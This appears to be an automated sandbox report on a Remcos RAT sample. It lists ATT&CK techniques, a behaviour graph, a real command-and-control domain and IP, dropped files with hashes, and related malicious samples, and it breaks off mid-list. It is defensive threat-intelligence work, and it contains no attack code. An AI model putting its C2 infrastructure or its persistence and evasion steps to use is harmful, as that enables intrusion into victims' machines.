            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol111
            Input Capture            		2
            Encrypted Channel            		Exfiltration Over Bluetooth1
            Defacement
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		1
            Windows Service            		3
            Obfuscated Files or Information            		2
            Credentials In Files            		1
            System Service Discovery            		SMB/Windows Admin Shares3
            Clipboard Data            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            Service Execution            		Login Hook122
            Process Injection            		12
            Software Packing            		NTDS3
            File and Directory Discovery            		Distributed Component Object ModelInput Capture1
            Remote Access Software            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
            Scheduled Task/Job            		1
            Timestomp            		LSA Secrets33
            System Information Discovery            		SSHKeylogging2
            Non-Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials121
            Security Software Discovery            		VNCGUI Input Capture22
            Application Layer Protocol            		Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Masquerading            		DCSync31
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
            Virtualization/Sandbox Evasion            		Proc Filesystem3
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation            		/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron122
            Process Injection            		Network Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518542 Sample: SecuriteInfo.com.Win32.PWSX... Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 48 officerem.duckdns.org 2->48 50 geoplugin.net 2->50 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 66 10 other signatures 2->66 8 SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe 7 2->8         started        12 ZRuVeAoBoxootS.exe 5 2->12         started        signatures3 64 Uses dynamic DNS services 48->64 process4 file5 40 C:\Users\user\AppData\...\ZRuVeAoBoxootS.exe, PE32 8->40 dropped 42 C:\...\ZRuVeAoBoxootS.exe:Zone.Identifier, ASCII 8->42 dropped 44 C:\Users\user\AppData\Local\...\tmpAAF6.tmp, XML 8->44 dropped 46 SecuriteInfo.com.W...n.9317.6656.exe.log, ASCII 8->46 dropped 68 Uses schtasks.exe or at.exe to add and modify task schedules 8->68 70 Adds a directory exclusion to Windows Defender 8->70 72 Injects a PE file into a foreign processes 8->72 14 SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe 2 13 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        74 Multi AV Scanner detection for dropped file 12->74 76 Contains functionalty to change the wallpaper 12->76 78 Machine Learning detection for dropped file 12->78 80 4 other signatures 12->80 24 ZRuVeAoBoxootS.exe 12->24         started        26 schtasks.exe 1 12->26         started        28 ZRuVeAoBoxootS.exe 12->28         started        signatures6 process7 dnsIp8 52 officerem.duckdns.org 103.186.116.145, 49709, 49719, 49720 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 14->52 54 127.0.0.1 unknown unknown 14->54 56 geoplugin.net 178.237.33.50, 49712, 80 ATOM86-ASATOM86NL Netherlands 14->56 82 Detected Remcos RAT 14->82 84 Loading BitLocker PowerShell Module 18->84 30 WmiPrvSE.exe 18->30         started        32 conhost.exe 18->32         started        34 conhost.exe 20->34         started        36 conhost.exe 22->36         started        38 conhost.exe 26->38         started        signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe21%ReversingLabs
            SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe21%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://geoplugin.net/json.gp0%URL Reputationsafe
            http://geoplugin.net/json.gp/C0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://geoplugin.net/json.gp80%Avira URL Cloudsafe
            http://geoplugin.net/json.gpB0%Avira URL Cloudsafe
            127.0.0.10%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            geoplugin.net
            		178.237.33.50
            		truefalse
              		unknown
              officerem.duckdns.org
              		103.186.116.145
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpfalse
                • URL Reputation: safe
                		unknown
                127.0.0.1true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpBSecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gp8SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gp/CSecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, ZRuVeAoBoxootS.exe, 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1601575428.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, ZRuVeAoBoxootS.exe, 0000000A.00000002.1677124907.00000000029C7000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                103.186.116.145
                		officerem.duckdns.orgunknown
                		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                178.237.33.50
                		geoplugin.netNetherlands
                		8455ATOM86-ASATOM86NLfalse

                Private

                IP
                127.0.0.1

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1518542
                Start date and time:2024-09-25 19:44:16 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 9m 35s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:21
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                Detection:MAL
                Classification:mal100.rans.troj.spyw.evad.winEXE@21/16@2/3
                EGA Information:
                • Successful, ratio: 75%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 179
                • Number of non-executed functions: 191
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, PID 5292 because there are no executed function
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                13:45:36API Interceptor4268375x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe modified
                13:45:38API Interceptor43x Sleep call for process: powershell.exe modified
                13:45:42API Interceptor1x Sleep call for process: ZRuVeAoBoxootS.exe modified
                18:45:38Task SchedulerRun new task: ZRuVeAoBoxootS path: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                103.186.116.145SecuriteInfo.com.Trojan.Packed2.48025.19608.243.exeGet hashmaliciousRemcosBrowse
                  Quote best offer 20240911.exeGet hashmaliciousRemcosBrowse
                    PO#0774.exeGet hashmaliciousRemcosBrowse
                      178.237.33.50https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                      • geoplugin.net/json.gp
                      file.exeGet hashmaliciousRemcosBrowse
                      • geoplugin.net/json.gp
                      SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                      • geoplugin.net/json.gp
                      BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                      • geoplugin.net/json.gp
                      z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
                      • geoplugin.net/json.gp
                      Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                      • geoplugin.net/json.gp
                      1DUCJGrpyb.exeGet hashmaliciousRemcosBrowse
                      • geoplugin.net/json.gp
                      1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                      • geoplugin.net/json.gp
                      XjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                      • geoplugin.net/json.gp
                      AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                      • geoplugin.net/json.gp

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      geoplugin.netMarys Organizer 2023 Release.zipGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      file.exeGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                      • 178.237.33.50
                      BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                      • 178.237.33.50
                      z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
                      • 178.237.33.50
                      Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                      • 178.237.33.50
                      1DUCJGrpyb.exeGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                      • 178.237.33.50
                      XjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                      • 178.237.33.50
                      officerem.duckdns.orgSecuriteInfo.com.Trojan.Packed2.48025.19608.243.exeGet hashmaliciousRemcosBrowse
                      • 103.186.116.145
                      Quote best offer 20240911.exeGet hashmaliciousRemcosBrowse
                      • 103.186.116.145
                      PO#0774.exeGet hashmaliciousRemcosBrowse
                      • 103.186.116.145
                      Request Quotation.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                      • 103.186.117.150
                      Request for quotation.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                      • 103.186.117.150
                      SecuriteInfo.com.Trojan.Siggen29.4082.22291.17805.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                      • 103.186.117.150
                      INV-012056.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                      • 103.186.117.150
                      Enquiry 230424.batGet hashmaliciousRemcos, DBatLoaderBrowse
                      • 23.95.235.29
                      Quotation 20242204.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                      • 23.95.235.29
                      Quotation 20241804.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                      • 23.95.235.29

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      AARNET-AS-APAustralianAcademicandResearchNetworkAARNersJtZBgpwG.elfGet hashmaliciousMiraiBrowse
                      • 103.128.198.80
                      https://dweb.link/ipfs/QmesssDqFnCTLy37t8Srcq12Tjchz4atRzkxjV2QTjw1sp/Get hashmaliciousUnknownBrowse
                      • 103.180.114.1
                      http://alicona.tbfs-industerial.com/auth/activeyg/3mail@b.cGet hashmaliciousUnknownBrowse
                      • 103.191.241.218
                      http://uscwm.tbfs-industerial.com/activate/activeaG/3mail@b.cGet hashmaliciousUnknownBrowse
                      • 103.191.241.218
                      SecuriteInfo.com.Trojan.Packed2.48025.19608.243.exeGet hashmaliciousRemcosBrowse
                      • 103.186.116.145
                      QUOTATION.exeGet hashmaliciousRemcosBrowse
                      • 103.186.117.77
                      SecuriteInfo.com.Linux.Siggen.9999.13221.8731.elfGet hashmaliciousUnknownBrowse
                      • 103.160.46.122
                      Purchase Order.exeGet hashmaliciousRemcosBrowse
                      • 103.186.117.126
                      Quotation_pdf.exeGet hashmaliciousRemcosBrowse
                      • 103.186.117.126
                      jade.mpsl.elfGet hashmaliciousMiraiBrowse
                      • 157.85.169.255
                      ATOM86-ASATOM86NLMarys Organizer 2023 Release.zipGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      file.exeGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                      • 178.237.33.50
                      BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                      • 178.237.33.50
                      z65orderrequest.bat.exeGet hashmaliciousGuLoader, RemcosBrowse
                      • 178.237.33.50
                      Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                      • 178.237.33.50
                      1DUCJGrpyb.exeGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                      • 178.237.33.50
                      XjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                      • 178.237.33.50

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.log

                      Download File
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZRuVeAoBoxootS.exe.log

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\json[1].json

                      Download File
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):962
                      Entropy (8bit):5.012309356796613
                      Encrypted:false
                      SSDEEP:12:tklu+mnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdbauKyGX85jvXhNlT3/7AcV9Wro
                      MD5:14B479958E659C5A4480548A393022AC
                      SHA1:CD0766C1DAB80656D469ABDB22917BE668622015
                      SHA-256:0F92BDD807D2F5C9947E1775A20231233043C171F62E1AFA705A7E7938909BFE
                      SHA-512:4E87CA47392DD9710F9E3D4A2124A34B41938986A4F43D50A48623DB1838C0D6CFF05FD2A23792DCD5A974A94416C97DC04ECEF85025FC785F3393B69A0B1DC5
                      Malicious:false
                      Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):2232
                      Entropy (8bit):5.380747059108785
                      Encrypted:false
                      SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//Z8vUyus:lGLHxvIIwLgZ2KRHWLOuggs
                      MD5:E5E9C3618702BF4DFB621AE99ED656DD
                      SHA1:EAB29C5E0F5D8F6EBAF77F2B3564D62C0EBBD7F2
                      SHA-256:B02E47FE68A5AE509C8C52CA65BBDF58363AAC3CBFF8FC20BB607BFECEBCE8E9
                      SHA-512:3396F58DD7E46582028DC514EEA8F6A52EC4E48D701F61AD5C7869C75EED2061D0104AE33566C010913BF55D899B1B62B790573DD529572346F3D18F4BF59553
                      Malicious:false
                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pmywpym.zns.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bf1som1k.bkf.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3kx0xm0.jis.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hdijaa0z.5td.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzahx3fj.qhl.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjw0skxy.dk0.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2l1vtjz.ivp.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
